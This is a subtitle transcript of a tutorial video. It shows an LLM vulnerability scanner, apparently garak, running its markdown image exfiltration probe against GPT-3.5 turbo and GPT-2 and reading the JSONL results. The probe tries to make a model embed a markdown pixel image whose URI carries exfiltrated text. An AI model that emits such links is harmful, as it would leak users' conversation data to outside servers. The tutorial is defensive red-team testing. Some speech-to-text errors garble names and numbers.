WEBVTT

00:00.680 --> 00:02.240
Hello everyone and welcome.

00:02.640 --> 00:06.600
In this video we will go over the probe markdown image exfiltration.

00:06.920 --> 00:12.200
For that, I'll walk you through the documentation of the probe on Garrick reference documentation.

00:12.520 --> 00:15.680
On the left hand menu I'll go to the direct probes.

00:15.840 --> 00:19.360
And here is where you'll find the details about all the probes.

00:19.480 --> 00:21.800
I'll click on the probes XSS.

00:22.000 --> 00:25.520
And in there we have markdown image exfiltration.

00:26.400 --> 00:27.680
Here's what it says.

00:27.880 --> 00:33.120
And we get the model to write embed assets exfiltration text in the URI.

00:33.760 --> 00:38.520
Attempts will be made to get the model to plant a markdown pixel image in output.

00:38.920 --> 00:46.840
Now let's go ahead and do a hands on activity using this probe on GPT 3.5 turbo model and GPT two model

00:46.880 --> 00:48.040
on hugging face.

00:48.600 --> 00:51.120
So here's the PyCharm project.

00:51.320 --> 00:54.480
I am at the root directory for the Garrick project.

00:54.680 --> 00:57.640
The run configuration is generations is one.

00:58.040 --> 01:02.640
Basically, this means that we want the prompts to be sent to the model only once.

01:03.080 --> 01:06.160
Plugins field here has probe that we want to specify.

01:07.000 --> 01:11.800
In this scenario we have x dot markdown image exfiltration.

01:12.000 --> 01:15.200
The model type here is OpenAI which is a platform.

01:15.200 --> 01:19.520
And then the model name is GPT 3.5 turbo.

01:19.760 --> 01:26.080
And the reported directory is same as the root directory with the reports as directory within the root

01:26.080 --> 01:26.920
directory.

01:27.160 --> 01:28.960
Now let's go ahead and run this.

01:29.880 --> 01:35.320
For that I'll have to add the command correct config probe exfiltration and go ahead and execute this.

01:35.680 --> 01:42.120
But before I execute this I wanted to emphasize the fact that you can run the same yml files with the

01:42.120 --> 01:43.200
CLI command.

01:43.560 --> 01:49.840
It's just easy for me to use a CLI command because it's more descriptive and I don't have to do repetitive

01:49.840 --> 01:51.280
things again and again.

01:52.240 --> 01:57.880
That's why I'm using a yml file, but you can use whatever works best for you.

01:58.200 --> 02:00.720
So for now I'll go ahead and execute this.

02:01.040 --> 02:04.880
If you notice it's reporting to our reports.

02:05.080 --> 02:09.880
The entry and the markdown that that we wanted to probe is shown here.

02:09.880 --> 02:16.830
And it passed both the test that is basic exfiltration and markdown Down exfiltration for content.

02:17.070 --> 02:17.950
That's great.

02:18.230 --> 02:21.070
Now let's go ahead and analyze the result for this execution.

02:21.830 --> 02:24.430
So here is the JSON line format.

02:24.710 --> 02:26.870
All the descriptions has been here.

02:27.110 --> 02:30.270
It's hard to determine and understand each line item.

02:30.270 --> 02:32.590
If since this is a lot of details.

02:32.870 --> 02:33.790
Let's do this.

02:33.950 --> 02:37.350
Let's pick one result and go ahead and use it in another file.

02:37.390 --> 02:37.990
JSON.

02:38.310 --> 02:40.550
I'm going to do a soft wrap here.

02:40.790 --> 02:42.550
So here is the entire result.

02:42.550 --> 02:44.270
That was bitter determined.

02:44.430 --> 02:48.390
So let's go over the fields that are part of these results.

02:48.670 --> 02:51.710
Here's the prompt that was sent to the foundation model.

02:52.110 --> 02:53.390
Here's the output.

02:54.310 --> 02:59.830
Then we have this detector results field that will determine the results and evaluate it.

03:00.230 --> 03:05.830
And that is pretty much the the different parts of the or the main parts of the results that you want

03:05.830 --> 03:06.430
to know.

03:06.710 --> 03:10.470
So now let's go ahead and run the same results with a different model.

03:10.750 --> 03:17.230
So in this scenario what I'm going to do is I'm going to use again hugging face.

03:17.670 --> 03:21.470
Have the GPT two as the model that we want to execute.

03:22.310 --> 03:29.700
Clear everything and Garrett config probe exfiltration since GPT two is hosted on.

03:29.740 --> 03:35.380
Hugging face and it's pretty much a free, resource driven platform, it takes a while for it to execute

03:35.380 --> 03:40.700
the entire set of exfiltration probes that we would throw out the model.

03:40.740 --> 03:46.500
I'm going to pause the video for a little bit, and once it's done, I will resume it and we can go

03:46.500 --> 03:47.580
over the results.

03:47.780 --> 03:48.460
Thank you.

03:48.740 --> 03:49.700
And I'll be back.

03:50.020 --> 03:55.340
So after 1120 five seconds, the job was completed.

03:55.700 --> 03:59.060
And if you notice, it passed all 12 out of 12 tests.

03:59.060 --> 04:03.940
It created a file, a JSON line format file in the reports directory.

04:04.140 --> 04:05.660
Let me open that.

04:05.660 --> 04:07.540
And here it ran the tests.

04:07.540 --> 04:12.060
I'm going to pick one random test here and put that in the results file.

04:12.500 --> 04:18.700
And if you notice here very similar format there's a prompt.

04:18.700 --> 04:20.740
And then there is output here.

04:20.940 --> 04:23.700
And then there is a deductive results with the notes.

04:23.900 --> 04:27.260
And that's the overall format that the tool uses.

04:27.620 --> 04:30.740
Thank you so much I will see you in the next video.